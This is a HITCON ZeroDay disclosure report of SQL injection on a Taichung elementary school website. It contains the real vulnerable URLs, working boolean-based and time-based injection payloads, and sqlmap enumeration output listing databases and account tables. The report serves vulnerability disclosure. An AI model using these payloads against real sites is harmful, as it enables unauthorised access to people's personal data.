大勇国小多处SQL - HITCON ZeroDay

Vulnerability Overview

ZDID: ZD-2018-00410
發信 Vendor: 臺中市資訊教育暨網路中心
Title: 大勇国小多处SQL
Introduction: 大勇国小多处SQL

處理狀態

目前狀態

公開

Last Update : 2018/06/16

新提交
已審核
已通報
已修補
未複測
公開

處理歷程

2018/04/06 23:58:45 : 新提交 (由 Cra5h 更新此狀態)
2018/04/07 00:28:32 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2018/04/07 20:13:58 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2018/04/07 20:13:59 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2018/04/07 20:13:59 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2018/05/29 12:46:42 : 複測申請中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2018/06/16 03:00:21 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2018-00410
通報者：cra5h (Cra5h)
風險：高
類型：資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料（包含大量使用者個資或敏感性資料），同時也有機會對資料進行破壞或修改。

漏洞說明： OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明： OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明： CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式： OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

大勇国小多处SQL
SQL位置：
http://www.dyes.tc.edu.tw/teach_data_1.php?classid=140
classid参数过滤不严导致SQL产生

GET parameter 'classid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 122 HTTP(s) requests:

Parameter: classid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=140 AND 8586=8586

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: classid=140 AND SLEEP(5)

[20:52:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.12
[20:52:29] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.dyes.tc.edu.tw'

确认影响库：（12库）
available databases [12]:
[] arrange_class
[] class2
[] class_dyes
[] class_ok
[] dyes_data
[] gallery2
[] information_schema
[] mysql
[] teach_data
[] teach_data_bak
[] test
[] testtest

[20:55:53] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.dyes.tc.edu.tw'

查看数据量：
Database: teach_data
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| loginlog | 25285 |
| data | 5117 |
| dataclass | 416 |
| dataclass_o | 411 |
| account | 307 |
| contenttype | 16 |
| post_item | 5 |
| stu_work_collocation | 4 |
| groups | 2 |
| teach_urls | 2 |
| teacher_base | 2 |
| system | 1 |
+---------------------------------------+---------+

Database: dyes_data
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| contenttype | 16 |
| post_item | 5 |
| stu_work_collocation | 4 |
| loginlog | 3 |
| groups | 2 |
| teacher_base | 2 |
| account | 1 |
| system | 1 |
+---------------------------------------+---------+

Database: teach_data_bak
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| loginlog | 11172 |
| data | 2841 |
| dataclass | 316 |
| account | 244 |
| contenttype | 16 |
| post_item | 5 |
| stu_work_collocation | 4 |
| groups | 2 |
| teach_urls | 2 |
| teacher_base | 2 |
| system | 1 |
+---------------------------------------+---------+

Database: class_dyes
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| act_stud | 3305 |
| fin_stud | 1198 |
| school_data | 10 |
+---------------------------------------+---------+

Database: gallery2
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| g2_Entity | 42182 |
| g2_ChildEntity | 42117 |
| g2_Derivative | 27484 |
| g2_DerivativeImage | 27484 |
| g2_AccessSubscriberMap | 14633 |
| g2_FileSystemEntity | 14632 |
| g2_Item | 14593 |
| g2_ItemAttributesMap | 14593 |
| g2_ImageBlockCacheMap | 14559 |
| g2_DataItem | 13968 |
| g2_PhotoItem | 13922 |
| g2_SessionMap | 4902 |
| g2_DescendentCountsMap | 2575 |
| g2_PluginPackageMap | 2395 |
| g2_DerivativePrefsMap | 1248 |
| g2_PluginParameterMap | 1014 |
| g2_EventLogMap | 1000 |
| g2_AlbumItem | 624 |
| g2_AccessMap | 267 |
| g2_MimeTypeMap | 157 |
| g2_FactoryMap | 145 |
| g2_FailedLoginsMap | 104 |
| g2_UserGroupMap | 102 |
| g2_TkOperatnMimeTypeMap | 97 |
| g2_PluginMap | 69 |
| g2_Schema | 59 |
| g2_User | 45 |
| g2_ExifPropertiesMap | 44 |
| g2_ThumbnailImage | 39 |
| g2_MovieItem | 38 |
| g2_PermissionSetMap | 24 |
| g2_Getid3PropsMap | 20 |
| g2_TkPropertyMimeTypeMap | 20 |
| g2_TkOperatnParameterMap | 19 |
| g2_PendingUser | 9 |
| g2_TkOperatnMap | 9 |
| g2_Group | 6 |
| g2_RecoverPasswordMap | 5 |
| g2_MaintenanceMap | 2 |
| g2_TkPropertyMap | 2 |
| g2_LinkItem | 1 |
| g2_SequenceEventLog | 1 |
| g2_SequenceId | 1 |
| g2_SequenceLock | 1 |
| g2_WatermarkImage | 1 |
+---------------------------------------+---------+

Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 809 |
| help_topic | 466 |
| help_keyword | 395 |
| help_category | 36 |
| db | 13 |
| user | 12 |
+---------------------------------------+---------+

Database: arrange_class
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| school_data | 4 |
+---------------------------------------+---------+

Database: class2
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| act_stud | 1765 |
| fin_stud | 440 |
| school_data | 7 |
+---------------------------------------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1296 |
| STATISTICS | 290 |
| KEY_COLUMN_USAGE | 202 |
| TABLES | 172 |
| TABLE_CONSTRAINTS | 163 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| CHARACTER_SETS | 36 |
| SCHEMATA | 12 |
+---------------------------------------+---------+

[22:08:19] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.dyes.tc.edu.tw'

第二处：
http://www.dyes.tc.edu.tw/teach_data_1.php?classid=185

修補建議

过滤，参数化

擷圖

留言討論

聯絡組織

發送私人訊息

您也可以透過私人訊息的方式與組織聯繫，討論有關於這個漏洞的相關資訊。

大勇国小多处SQL - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

處理狀態

目前狀態

處理歷程

詳細資料

參考資料

相關網址

敘述

GET parameter 'classid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 122 HTTP(s) requests:

修補建議

擷圖

留言討論

聯絡組織

Vulnerability Detail Report

Vulnerability Overview

處理狀態

目前狀態

處理歷程

詳細資料

參考資料

相關網址

敘述

GET parameter 'classid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 122 HTTP(s) requests:

修補建議

擷圖

留言討論

聯絡組織

GET parameter 'classid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 122 HTTP(s) requests: